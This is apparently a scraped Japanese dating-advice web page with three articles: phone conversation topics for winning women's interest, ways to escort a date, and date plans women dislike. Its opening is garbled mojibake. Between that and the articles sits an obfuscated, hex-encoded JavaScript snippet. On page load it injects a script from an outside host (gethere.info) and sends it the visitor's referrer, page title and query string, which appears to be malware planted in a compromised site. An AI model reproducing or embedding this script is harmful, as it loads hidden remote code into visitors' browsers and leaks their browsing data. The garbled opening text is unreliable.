a?�a???��a?�a??a��c��?��a?�a??a??a?�a??a?�a?�a��a�?a?�a��c?�a?�a�?a??e�?a??e��??�a?�a�?a?�a?�a??a?�a??a?�a�?a?�i??e�?a?�a?�e??a??a?Ya?�a??a?Ya�??��a?�e??a?�a��a��a?�a?�a��a�?a??a?�a�Sa�za??a��a?�a?�a?�a?�a??i?�a??a��a?�a?�?��???a??a��a???��a?????a?�a?�a?�a?�a??i??i?�a?�a?�a��a��a??a??a?�a��

a??a?�a?Ya�?a?�a��?�?e??a�Sa?�a?�a��a?�a??a?�a�Sa??a��a??a�?a?�a?�a?Sa??a??a?�a��a?�i??

e??a??a?Ya?�a??e?�a??a?�a?�a?Ya�??��a?�e??a?�

a?�a�?a??a?Se??a�?a�Sa?�a��a?�???aSYc??cZ�a??e�?a?�a?�a?�a��

?�?e??a�Sa?�a?�a??a??a?�a??a?�a��a�?a??a?�a???��a?�a??a??a?�a??a?�a�?a?�e?Ya?�a?�a?�a?�a?�a??a?�a??e???��a??a?�a�Sa??a?�a��

a?�a?�a??a�?e??a??a?Ya?�a??e?�a??a?�a?�a?Ya�??��a?�a?�a�?a?�100i?�e?Ya?�a?�a?�a?�a??a��a?�a?�a��a?�a��

a�?a?�a?�a�?a�?a�?a?�a?�a?Ya�Se��??�a?�a�?a?�a?�a??a?�a�?a?�i??i?�a��a��a��a??a??a?�a��

a?Ya?�a?�a�?a�????a??a?�a?�a???��a?�e??a??a?Ya?�a�??��a��cY?a??a?�a?�a��a?�e�?a??a?�a�Sa??a?�a��

a??a?�a?Ya�?a?�a??a?�a��c?�a?�a?se��a��e�?a?�a�?a??a??a��a??a��a??a??a?�a��a?�e�?a??a?�a�Sa??a?�a��

a??a?�a?�a??a?Ya?�??�a��a??a?�e�?a?�a?�a??a�?a?�a??a�Se�?a?�c??cZ�a?�i??i?�a��a��a��a??a��a?Ya�?e?za??a?�??�aS?a?�a?�a��a?�a��

e??a??e??a��a?�a?�a��a??a?�a�?a��c��a?�i??

a???��a??e??a??e??a��a?�a?�a��?��a�?e?�a?�a?�a??a?�a?�a?�a?�e��a��e?za?�a?�?�?a?�a?�a��a?�a��

a??a��a???��a��c��a??a?�a�?i??i?�a��a��a��a??a��a??e???��a??a�?a??a?�a?�a??a?�a��

a��a??a�Se??a??e??a��a?�a?�a��?��a??a?�a?�a?�a???��???a??a?????a��a?�a?Sa�Sa�?a??a?�??�a?�a??a???�?a?�a??a??a??a?Ya�Sa�?e�?a?�a?�e?�a?�?�?a?�a��e?za?�a?�?�?a?�a??a??a�Sa??a?�a��

a??a?�a?�a??a?Ya??c?�cS�?��a?�?��a?�a?�a�?a?�a�?a??a??a?�a?�a??a?�a?�a�?a��a?sa�??�?a�?a?si??i?�a?�a?�a?�a??a?�a?�a?�a��a?�a��

a??a?Ya�?e??a??e??a��a?�a?�a��?��a?�e??a?�a??i??c�?a?�a?�a??a��?��a?�a?�a?�a?�a??a�?a?Ya?�a?�a??i?Yi?�a??a???��a???�?a?�a?�a?�a��a?�a��

a??a?�?�?a�?a?�a��a?�a??a��e?za??a?�a???��a??e�?a?�a��?��a�?a��a?Sa?�??�aS?a?�a�?a�Sa??a?�a?�a??a??a?�e??a?�a��i??i?�a��a��a��a??a��a??e???��a??e�?a??a�Sa??a?�a��

a??a??a??a��e�?a?�a?�a?�a??a��?��a?�a?�a?�a?�a??a�?a��a??a�?e�?a?�a��???a??a?�a??a�?a��a??a��a??a??a?�a??a��a??c?�a??a??e��a?�a??a?�a��a?�a��a?�a?�a��

a??c�?a?�a?�a??a??a?�a?�a?�a??a??a�?c��c�scs�a??a?�a??a??a?�e??a?�a?�???aSYc??cZ�a��a�?a??a?�a?�a��a�?e?za??a?�??�aS?a??e??a?�?�?a?�a?�a��

a??a??c?�c��a��a??a��

a???��a��a?�a??a??a?�e??a?�a??a?�a?�e??c�?a??a�?a��a??a?�a��a?sa???��a?�a???�?a??a?�a��a?�a��a?�a??e??a?�a��a?�a��

e??a�?a�?a?Ya???��a��i??c�?a?�a?�a??a???��a?�a??a??a?�a��a?�a?�a??i?Yi?�a??a?�a?s?�?a?�a??a?�a��

a?�a?�a???�?a��?�Ya??a?�a��a��a?�a�?a��a?Ya??a��a��e��e?�a??a��a??a�?a?�a??a??a?�e??a?�a??a��?��a?�a��a?�a??a??a�Sa??a?�a��

a???�?a��?�Ya��a?�a?�a?�a?�a�?a��a?Ya??a��a?�a?�a?�a?�a??e????�a��a��e?�a��e��a?�a?�a�?a?�a�?a?�a�Sa??a?�a??a�?a??a?�a�?a��a?Ya??a��a?????a��a�?a?�a?�a??a??a?�e??a?�a?Ya?�i??a??a?�a?�a?�a?�a?�a�?a?�a??a??c?�c��a��a??a��a??a?�a?�?�???�a??a?Sa?�a?�a�?a?�a?�a��

?��a?�a??a??a?�a?�a��a?�a��e??a??a?�a?�a��a�?a?�a?�a??a??a?�a�?a???�?a�?a?�a��c?�c��a�?a?�a��a?�a��a?�a?�a?�a��

a?�a??a?�a�????a??a?�e?�c�Y?�?a?�a?�a�?a??a??a��e??a??a?Ya?�a��a?�a?�a?�a�?a?�a?�a?�a?�a?�a??a?�a?�a?�a�?a?�a��a??a?�a?�a��a?�c��a?�e��a?�a?�a?�a?�a��a�?a??e??a??a?�?��a?�a??a??a?�a?�a��a?�a��a?�a??a??a??a�?a?�a??a??a?�a��?�?e��a��a?�e�?a?�a?�a��a?Ya�?a?�e??a??a?�a?�a��a???�?a�?a?�a��a?�a??a??a�????a??a?�a��

a?�a?�a�?a?�a?�c?�c��a�?a?�a��a?�a��a?�a??a??a???�?a��?�Ya��a�?a��a?�a??a??a??a??a�?i??a??a?�?�?e��a��e?�a?�a??a��a?�a?�a??a?Ya��a?�a?�a?�a??a��i?�a??a?�a?�?��???a??a?�a??a��a?Ya�?a�?e??a?�a?�i??i?�a��a��a��a??a��a??e???��a??e�?a??a�Sa??a?�a��

a?�a??a??a?�a??a??a?�a??c��a��a??a��

a?�a�?a��a?Se??a??a??a?�a?�a��a?�a?�a?�a??a�??�?a?�a??a??a�Sa?�a??a??a???�?e�?a?�a?�a?�a?�a??a?�a??a�?e??a?�a?�a??a??a?�a??a?�a??a?�a?�a?�a??a???��a?�a??c?�a??a?�a?�a?�a�Sa??a?�a��

a?�a??a??a???�?e�?a?�a?�a?�a?�a??a?�a??i??a?�a?�a?�a�?a��a?�a?�a??i?Zi?Zi?Zi?�a??a?�i??a??a?�??�a��a??a�????a?�a?�a??a?�i?Zi?Zi?Zi?�a??a?�a?�?��???a??a??a�?c��a??a�?i??i?�a��a��a��a??a��a??e???��a??a?Za??a??a??a?�a?�a??a?�a??a?�a��

a??a?�a?�a?�a??a??a???�?e�?a?�a?�a??a?�a�?a?�a??a??c��a��a??a��a?�a?�a?�a��

a?�a??a?�e?�a�?a?�a??a?sa?�a?�a�?a?�a�?a�S?�?a��a��a?�a?�c�?a�?a?Ya?�a�?a?Sa?�a?�a��aS�a??a?�a?sa??a?�a?�a??a?�a�S?�?a?�a�?a?�e??a?�a��a?�a?�i?Ya�?a??e?�a??a?�e??a?�a�?a?�a??a??a?�a��a?�a??a??a?�a??a??a??a??a??c��cs�a??a?�a��a��a?�a�?a???�?a�?a?�a��a??c��a��a??a��a?�a?�a?�a��

a??a?�a?�a��a?�a??a?�i??c�?a��c�?a�?a?Ya?�a�???Z?�?a?�a��a��a?Sa?�a?�a��a?�a��e��a?�a��a?Ya�?a?�e??a??a?�a��a?�a?�a?�a��i?�a??a???��a?�?�?a�?a?�a��a?�a??a??a?�a??a�?i??i?�a��a��a��a??a��a??e???��a??e�?a??a�Sa??a?�a��

a?�a??a??a???�?e�?a?�a?�a??a?�a�?a?�a?�a?�a��a?�a??a??a�?i??i?�a��a��a��a??a��a??e???��a��e�?a�?a��a??a��a??a??a??a?�a?�a?�a��

a�?a??a?�a??a??a?�e??a?�i??

a�?a??a?�a??a??a?�e??a?�a??a?�a?�a?�a��a�Ya????�aS?a???��a?�a?�a��

a??a�?a?�a??a???�?a��?�Ya��a�?a��a��a??a�?a??a?�a?�i?Ya???�?a?�a?�a��a?�a�?a??a?�a��a��

a??a?�a�?a??a?�e�sa�Sa?�a��a?�a�?a???�?a��?�?a?�a??a??a�Sa??a??a?�a?�a??a?�a??a?�i??i?�a��a��a��a??a��a??e???��a��a?Sa?�a��a?�a?�a?�a��

a�?e?�a?�a??a?�a?Ya??a??a??e�?a?�a��???a??a?�a??a�?a��a??a��a??a??a?�a??a��a�?a?�a??a?�a�Sa??a?�a��

a�?a??a?�a??a??a?�e??a??a?�a???�?a��?�?a?�a??a??a�Sa??a??a��a?�a??a?�a�?c�??��a?�e�?a?�a��?�?e�?a?�a?�a??a?�a��

a��a?�a?�a?�a?Ya��1a�zc��a??a??a?�a�?a??a?�a??a??a?�a???�?a?�a?�a��?��a��a�?a��a?�a��a?�a�?a??a?�a��a??a�?a�?a??a?�a??a??a?�e??a??a?YaS??z?a??c��a��a?�a�?e��e?�a?�a??a??c�??��a??a??a?�a??e�?a?�a��?�?e�?a?�a��a�?a?�a?�a??a�Sa??a?�a��

a??a?�a?�a?�?�?e�?a?�a?�a?�a��?��e��a??e��a??a??a�?a?�a??a��a?�a?�a�?c�??��a??e�?a?�a?�a?�a??a???��a?�a??a??a?�a??a??a?�a��

a�?a??e?�a�?a�?a?�a?�a��a?�a??a?�a?�a??a�???�a??a??c�??��a??a??a?�a?�a?�a??a?�cS�?��a?�a�?e��a?�a?�a?�c�??��a��???a??a?�a?�a��?��a?�e�?a��a?�a??a?�a��

a�?a??a?�a??a??a?�e??a??a?Ya??a?�a?�a?�a�Ya��?��a?�a?�a??a?�c�??��a?�?�?e�?a?�a?�a��?��e��a��a?Za??a�?a?�a??a��a��?��a?�a??a��a?�a��a?�a??a?�???aSYa?�a�?a?�a�??�?a?�a?�a??a??a?�e??a?�a?�i??i?�a��a��a��a??a��a??e???��a??a??a??a??a?Sa??a�Sa??a?�a��

a��?��a?�a?�a��?�???�a?�a?�a??a�????aSYc??cZ�a??e�?a?�a?�a?�a��

a??a??a�?

a???��a?�c�?a??a��??�a??a�?a?�a�?a?�a??a??a?�e??a?�a?�???aSYc??cZ�a??a?Sa??a�Sa??a?�a��

a???��a??e��??�a??a?�a?�a?�c�Ya??c��a?�a�?e??a?�a?�a??a??a��?��a?�a??c?�c��a��?�?a?�a??a�Sa??a?�a��

a??a?Ya�??S?a?�a?�a?�a??a�?e�?a?�a��a??a??a?�a??a??a?�a??a�?a��a??a��a??a??a?�a??a��a�?a?�a??a?�a?�a?�a?�a��

a??a?�a?�a??a?Ya??a��a??a??a��?S?a?�a??a?�e??a?�a?�a??a?????aSYa?�e�?a?�a?�a��

a?Se??a?�e??e?�a?�a?Ye??a?�?�?a??a??a?�a??a��a??a??a��?S?a?�a??a?�a?�a��a��a?�a?�a?�a?�a?�a�????e?za?�e�?a?�a?�a?�a??a??a??a?�a?�a�?a??a?�a??a??a?�c?�??Ya��a?�a�Sa�?a?�a?�a??a?�a?�a?�a��
var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

女性があなたを好きになってしまう5つの電話のかけ方

女性と言うのは、しゃべっていても、脳の中は他の事を考えていたりします。

なので、女性の関心を引く電話の掛け方が良いのですが、興味を引いてほしいとあからさまな嘘をついたりすると嘘がバレたとき幻滅されてしまいますので効果は出ません。

では実際どんな話題で話したら女性はあなたのことを好いてくれるのでしょうか?説明していきたいと思います。

共通の話題で攻める!



これは、共通のテーマで持って行くはなしのしかたです。

女性の会話の仕方は「わたしこう思う」というのがとても多く、情報が間違えている場合があります。

ですがその時に「ほんとはそれ違うよ」と返すのはNGなんです。

ある程度違っていても、二人の共通の会話として「あ~それもあるよね!」という、うまい返し方をしなくてはなりません。

とくに、話がつまったときに、無理に話をすり込もうとするのは、女性から見て力量不足なので、女子の話に沿うように話をもっていかなくてはなりません。

将来について語り合う

男性よりも女性の方が将来について考えることが多いですが、男性はあまり考えることが少ないため、将来の話をすることによって他の男性との差をつけましょう。

例えば、結婚したいか、子供は何人欲しいか、将来どんな仕事がしたいか、夢は何か、などなどです。

結婚したいか子供は何人欲しいかに関してはやはり女性は誰しもが考える話なので結婚観や子供の欲しい数や、いついつまでに結婚出産したいかなどの価値観があえば好感度が急上昇します!

また、将来どんなことしたいかや夢を語ることによって、女性から(この人かっこいい)(将来性のある人だなぁ)(ちゃんと将来考えてて安心感をもてそう)なども思われます。

遠い将来の事だけではなく「明日どこ行く?」みたいなもので十分なのです。

ちょっとしたことでもいいので「デート中にどこどこ寄ってみない?」のような、具体性をを加えると女性もイメージしやすいので「あ!そこなら行ってみたい!」と理解してくれる可能性が高いです!

未来の話をするときに、男の方から「明日仕事行くのだるいわ」などのネガティブな話を出すのは駄目です。

元気のない男性だと思われる上に、ネガティブな男性で(一緒に話しててもつまらない)と思われてしまいます。

結局女性は、自分が上でいたいので、うまくサポートに回ると、デートの約束を取りやすいという前提があります。

女性の趣味について話してもらう



男性でも女性でも自分の好きなことを語っているときはとても気持ちがいいものです。

そのため女性から趣味について話してもらいましょう。

初めは相手の女性がどんな趣味を持っているかわからないため「〇〇ちゃんは何が趣味なの?」など質問してあげることによって趣味を聞き出すことができます。

趣味を離してもらうときの注意点としては、教え子と先生のような立ち位置になることが大事です。

人に何かを教えたり、驚かれたり、関心されたりするのは男女共に気持ちいものです。

そのため女性が「〇〇ってこうやってやるんだよー!」と自信満々に言ってきたときはある程度知っている内容でも「えー!〇〇ってそうやるの?!知らなかった!!」「マジ?!すげぇ!〇〇ちゃんって物知りなんだね!」とオーバーリアクションかつ勉強になりました!という返し方をすることによって、好感度が著しく上がります。

趣味の話題をしていくことによって、相手がどんなデートを望んでいるかを知ることもできます。

例えばボルダリングが趣味な女の子であれば、一緒にボルダリングに行って教えてもらうということができます。

あなたがボルダリングできれば、一緒に盛りあがれますし、できなかったとしても女性が教えてくれるため、自動的に好感度が上がります。

つまりどちらに転んでも好感度が上がる仕組みになっているため、趣味の会話は必須事項です。

思い出話をしてみる

思い出話と言うのも、長電話の出来る有効な会話のテクニックです。

例えば「学校の校長先生の話長かったよね(笑)」「それ受験の時のやつでしょ(笑)」などお互い体験した共感ある思い出話を出してあげるといいでしょう。

これは女性の興味をそそります。

更に、男性側が良く知っている話題という事がポイントで、ちょっとでも(この人あたまがいいな)と思わせることができれば加点ポイントです。

例えば思い出話で頭が良いと思われたりするのは方程式や理科の実験とかですね。

お互い経験したことがあり、話の話題にもたまーに出てくるからです。

先日電話した女性との中でも出てきて女性が「今従妹が来ていて、ちょうど方程式教えていたんだよね(笑)でも懐かしすぎてチンプンカンプンだったよ(笑)」という話でした。

こういうときはチャンスですね!

ただし、自分の事ばかり話していると、自己中とおもわれるので、そこは控えめに。

食事の話をする



今後デートするにあたって初めに食事の話はしておいた方が良いです。

なぜかというと相手の好き嫌いがわからないと、どのお店に連れていけばいいかわからないからです。

例えば相手が辛いものが嫌いなのに中華のお店に連れていってしまったり、小麦アレルギーなのに蕎麦屋につれていってしまったりしてしまい好感度がダダ下がりしてしまうからです。

そのため相手がどんな食べ物が好きで、どんな食べ物が嫌いなのか必ず聞いて覚えておくようにしましょう。

一度覚えて置いたら必ず覚えておくようにしましょう。

日にちがたちデートを誘うときにさらっと相手の好きな食事があるレストランなどに誘う事が出来れば(あれ?この人私と食事の好み一緒じゃん!)と好感度が上がります。

これはただ女性が食事の好き嫌いを話したのを忘れて男性が覚えて頂けなんですがね(笑)

ですがこういう小さな積み重ねをすることによって実際デートをしたときでも失敗なくデートができるため、必ず食事の話はするようにしましょう。

まとめ

いかがだったでしょうか?

特に初めての女性と電話するときは緊張しますよね。

ですが上記に挙げた5つの話題をすると決めておけば、5つの話題分は会話に困ることはありません。

質問攻めにならないように、ある程度自分の意見も織り交ぜて返してあげることが質問攻めにならないコツになります。

ぜひ実践してみてください。

【エスコートの達人!】女性が喜ぶ6つのエスコートやり方

せっかくデートするならば、女性を喜ばせたいと思いますよね。

本気で女性に喜んで欲しいと思ってするエスコートもあれば、いろいろと下心があるエスコートもあるかもしれません。しかし、いずれの場合も女性はエスコートを見せてくれる男性に惹かれます。

そもそもレディファーストの国ではないからこそ、どうしたら良いのかわからない、何をどのようにエスコートしたら良いのかわからない、という人もいるかもしれません。

ここでは、魅力を感じさせる自然なエスコートについてお話しします。

ドアを開ける/ドアを支える



デートするときは、どこか建物に入ったり出たりしますよね。

そんな時、ドアを開けたり閉めたりすることもあるのではないでしょうか。

全てが全て自動ドアならばともかく、ドアを押したり引いたりして開けたり閉めたりしなければならない場合、それは男性にとってはエスコート精神を見せる絶好のチャンスです。

さっと女性の前に立ち、ドアを開けましょう。

もし押して開けなければいけないドアならば、先に出て立ち止まり、ドアを抑えます。

ドアを引かなければいけないものならば、ドアを引いて先に女性に出てもらい、自分は後から出るようにしましょう。

ドアを開けてもらうことに慣れている女性であれば、男性がこのような態度をとった場合にスムーズに動きます。

もしもあなたがドアを開けた時、女性が迷うことなくドアから出て行ったのであれば、彼女はエスコートされ慣れているといえます。

なおさらあなたを見るには厳しくなるでしょう。

あなた自身、心して彼女をエスコートする必要があります。

もしも彼女が立ち止まり、どうすれば良いのかわからないっていう表情を見せた場合は「お先にどうぞ」などと言って、女性を先に生かせる意思がある、自分はドアを支えているんだ、という意識を表に出しましょう。

ドアを開けてもらい慣れていない女性やエスコートされ慣れていない女性は、それだけで感動するものです。

ドアによっては、非常に重たい場合もあります。

ですから、女性に開けさせるなんてとんでもないことです。

女性に魅力を感じて欲しい、自分のことを好きになってほしいなどという気持ちがあるならば、女性のためにドアを開けるという事は絶対にしなければいけないことです。

向かい側から人が来たらさっとよける

歩道を歩いている時、向かい側から人が来るということがありますよね。

決してほどではなかったとしても、歩いているときに向かい側から人が来るという事はよくあることです。

向かい側から人が来た場合、このままではぶつかると思ったら相手がよけてくれることを期待せず、自分がよけることを考えましょう。

特に、あなたの隣を歩いている女性に相手がぶつかりそうになった場合は(自分は大丈夫だから)(自分がぶつかるんじゃないから)などと思わずに、自分がさっとよけて女性を安全な場所に誘導することが大切です。

もしかしたら女性は、本当はよけたいのにあなたがいるおかげでよけることができない、という状態にいるのかもしれません。

仮にそうではなかったとしても、大事な女性が向かい側から来る誰かにぶつかるとなれば、やはり自分が女性を守るという意識を持ち、自分からよけて女性を安全な場所に誘導するということが大切です。

そうしてくれると、女性自身も守られているという気持ちを持ち、(この人と一緒にいると自分も安全)という安心感を持つことができるのです。

相手は人ばかりではなく例えば、向かい側から来る人が大型犬を連れていたりなど、どこに向かってくるかわからない、もしかしたら脅威の存在になるかもしれないと思える場合、とにかく女性を安全な場所に誘導するという意識を持ちましょう。

警戒心ばかりを持つ必要はありませんが、やはり「何かあったら困る」という意識が重要です。

道路を歩く時は外側を歩く



最近は誰もが車を持つ時代になりましたが、それでもデートをするならば、道路を歩くということもありますよね。

駐車場に車を止めたものの、道路を渡らなければいけないということもあるでしょう。

もしも道路を歩く場合は、男性は車道側を歩くようにしましょう。

特に深い意味はありませんが、これはやはり、万が一車が突っ込んできたなどのトラブルがあっても女性を守るという意識の表れです。

本当に車が突っ込んできたりしたら困りますが、女性は、男性が車道側を歩いてくれるだけで守られているような気持ちになるのです。

ただ車道側を歩くだけで大丈夫です。

たまに道路渡るときにも車が来る側に立ち、車線の真ん中で位置を入れ替わり、また車が来る側に立とうとしてくれる男性がいます。

つまり、道路を渡るときに最初は右側に立ってくれて、車線の真ん中で左側に入れ替わってくれるということです。

確かに車が来る側に立つという事は非常に勇ましいことですが、ここまでやりすぎると女性の中には(私は妊婦って思われているのかな)と思ってしまう人もいますから、そこまではやらなくても良いでしょう。

ただ、道路を歩くときには車道側を歩くだけで良いのです。

それだけで、女性はエスコートしてもらっているような気持ちになります。

禁煙席を選ぶ

女性がタバコを吸わない人ならば、レストランや喫茶店に行ったときには迷わず禁煙席を選びましょう。

あなたがタバコを吸う、そして彼女はそれを認めてくれているという場合であったとしても、出来る限り禁煙席を選んだ方が女性にとってのあなたの印象は良くなります。

なぜならば、タバコ吸わない女性の場合、言わないだけでタバコの煙を嫌悪している可能性があります。

本当はタバコの煙が嫌だけれど、好きな男性の前だから、自分に関心を示してくれている男性の前だから、なかなか嫌だとは言えない、という可能性もあるのです。

さらに、タバコの匂いは服に付着します。

デートのらば彼女はお気に入りの服装やおしゃれな服装で来るでしょう。

そんな服にタバコの匂いがついてしまったら嫌だ、でもそんなこと言えない、と女性は考えているかもしれません。

そのため、タバコの匂いがついてしまうような場所に女性を誘導してはいけません。

可能であれば禁煙のお店を探したり、もしも分煙であるならば迷わずに禁煙席を選びましょう。

デートの際には喫煙席は選ばない方が良いですし、喫煙席しかないようなお店は避けた方が無難です。

また、デートの時に女性の前でタバコを吸わない方がいいですし、お店に限らず車の中でもタバコは避けましょう。

もしも普段車の中でタバコ吸っている場合は灰皿を片付け、消臭剤を置くなどしてタバコの煙を消しておいた方が無難です。

帰りは最寄り駅や家の近くまで送る



デートが終わって家に帰る時、その場でさよならはいただけません。

もしも公共交通機関を使っているならば、ぜひ女性の家の最寄り駅や家の近くまで送るようにしましょう。

なぜ家の近くかというと、まだお互いの関係が深くはない場合や、下心がないということを見せたい場合、家までは送らないほうが良いこともあるからです。

女性が一人暮らしである場合、女性の家まで彼女を送ろうとすると(もしかして家に上がる気なんじゃないのか)(私の家を知ってどうするんだろう)(下心があるんじゃないのか)などと女性をやきもきさせてしまう可能性があります。

クリーンなイメージを与え、下心がないということを示すためには家までは直接送らないほうが良いこともあります。

例えば最寄り駅まで送ったり、駅から自宅まで遠い場合は一緒に歩くようにしましょう。

しかし、やはり自宅まで送りたい、街灯がなくて暗いから自宅まで送らなければ心配などという場合は「家まで送ったらすぐに帰るから」などと言って、自分には下心がないことを示しておいた方が良いでしょう。

そのほうが、女性は安心してあなたに送ってもらうことができます。

最近では、女性を自宅まで送り届けるような律儀な男性は減りつつありますから、女性にとっても幸せな瞬間となります。

しかし、もしも自分には下心がないということを明確にしたのであれば、女性の家についてから「上がってもいい?」などと狼の顔を見せてはいけません。

そんなことをしたら、女性からの信頼は失います。

やはりデートの帰りは紳士として行動しなければいけないのです。

冷房・暖房の風が当たりにくい場所を選ぶ

夏になれば、涼しいレストランや喫茶店は天国に感じますよね。

冬になると、温かい室内はありがたいものです。

また、冷たい飲み物が欲しかったり温かい飲み物が欲しかったりと、レストランや喫茶店に入ることもあるでしょう。

そのような場合、冷房や暖房がどこにあるかということを確認しましょう。

お店によっては、ウェイターから誘導され、場所を決められる場合がありますが、そのような場合においても、冷房や暖房の風が直接当たらない場所を選びましょう。

仮にウェイターが「こちらにどうぞ」とテーブルを指定してきた場合であっても、座る位置によって風の当たり具合は全然違います。

特に女性の場合、夏は冷房で体が冷えないように気をつけている場合もありますし、冬は暖房で風が当たりすぎると辛い、という場合もあります。

そのため、風が直接当たらない場所を女性に譲ってあげます。

特に夏場、直接体に当たる冷房は女性にとっては良くありません。

そのため、もしも女性に風が直接当たっているという場合は「大丈夫?入れ替わろうか?」と提案しましょう。

自分たちで席を選ぶことができる場合は、風が当たらない場所を選びましょう。

もちろん、女性が好き好んで風が当たる場所に座りたがる場合もあります。女性が選んだならばそれはそれで問題ありません。

しかし、女性の中には「寒いから替わって」「風が当たって寒いからテーブルを替えたい」となかなか言えない人もいます。

そのため、相手に応じて対応をしっかり考える必要があります。

まとめ

いかがでしょうか。女性をエスコートしたいと思うならば、紳士としてレディーファーストをすることが大切です。そして、紳士として振る舞うのであれば最後まで紳士として振る舞いましょう。

くれぐれも途中で狼の顔を見せてはいけません。

自然にエスコートしてもらったとき、女性はそれをキザだと思ったり、気持ち悪いと感じたりすることはありません。あくまでも自然にということを心がけ、スマートにレディーファーストできるようになりましょう。

【注意!】女性が嫌がってしまう〇つのデートプラン

デートプランを計画するって、意外と神経を使うものですよね。

多くの場合、男性と女性では関心のあるものが違ってくるので難しいところがあると思います。

気になる女性をデートに誘いたいものの、どこへ行ったらいいのか逆にどこはNGなのか全くわからない!!

そんな悩める男性のために、今日は女性を連れていくと嫌われてしまうかも・・・な、デートスポットやデートプランを紹介します。

やってはいけないNGなデート

過度にうるさい場所には連れていくな!



周りの騒音にかき消されてコミュニケーションが円滑に行えないレベルの居酒屋や、クラブミュージックの流れる飲み屋など場合によっては盛り上がるかもしれませんが大抵の場合、会話がうまく進まなく互いにストレスになります。

小声で話しても十分聞き取ることができるレベルでゆったりとしていて、静かな場所をデートスポットに選びましょう。

ひそひそ声で話していると中身は無くとも内緒話をしているようでドキドキするのが乙女心です。

でもあくまで自然な感じで話さないとかえって不信感が募るので、そのさじ加減は気をつけましょう。

お金がないから安上がりなデートはNG

お金もないし、特にデートスポットも思いつかないし・・・安上がりだから漫画喫茶でいっか!

ひとまず深呼吸して、考え直してください。女の子サイドからズバリ一言。

「ありえない・・・」

手抜き感が伝わってくるチョイスです。

百歩譲ってお金がないのはやむを得ないこともあるので、女の子は気にしません。

あまり贅沢ができないのであればせめて、女の子の気持ちを汲んだ景色の素敵な場所を選びましょう。

例えば海だったり、星の綺麗な場所だったり・・・お金をかけずに綺麗な景色の見える場所って少なからず一箇所くらいはどこでもあるはずです。

探しても見つからないんだ!非常に困った!と言うのであれば、ドライブデートでも可です。

男性が運転する姿を助手席で見守るのが女子の夢だったりするのです。

好意を寄せている相手となら、デパートでひたすらウインドーショッピングするだけでも女の子は喜んでします。

たくさんお金をかけたらデート成功、そういうわけではないのを心しておきましょう!

趣味全開のスポットは微妙



男の人ならギャンブル、車、バイク、アニメなどが好きな方が多いと思います。

例えばギャンブルが大好きな人で女の人とパチンコ屋に行きたいなと考えている方は、お互いに楽しめる範囲で、女性の了承があれば問題ないのかもしれませんが、そうでない場合最悪な印象を植え付けることになります。

趣味でアニメ好きであれば漫画喫茶やメイド喫茶などに行きたいでしょうし、車やバイクが好きな方なら車屋さんやバイクのレースが行われる場所に行きたい気持ちがあると思います。

女の人と趣味の良さを分かち合いたい、自分が楽しいと思うことを相手にも楽しいと思って欲しいという気持ちがあればまた別の話ですが、目の前の趣味を最優先で女の人をほったらかしにすると痛い目を見ますよ!

女の人は興味のないことには冷酷な性格をしていることが多いです。

慈悲の心でその場でニコニコ笑っていたとしても、心底幻滅していたら次のデートには漕ぎ付けないことを覚えておきましょう。

どうしてもデートスポットが思いつかなくて、自分の趣味に関する場所に女の人と行くことになったのであれば、女の人への気遣いを忘れないことが最低条件です。

気遣いとは、お手洗いの心配やたくさん歩いたら休憩しようか?などの声かけです。

これができるスマートな男性は「気が利くんだなぁ」と思ってもらえるのでモテます。

女性が興味あるおすすめデートスポット



ここに連れていったら嫌われるでしょう、といったデートスポットやプランを紹介しましたが逆にどこへ連れて行けば女の人に喜ばれるのか気になりませんか?

女性は美味しいものや綺麗な場所、可愛い形のスウィーツなどに目がない生き物です。

今は雑誌やテレビより先にSNSへ情報が入ってくる時代です。

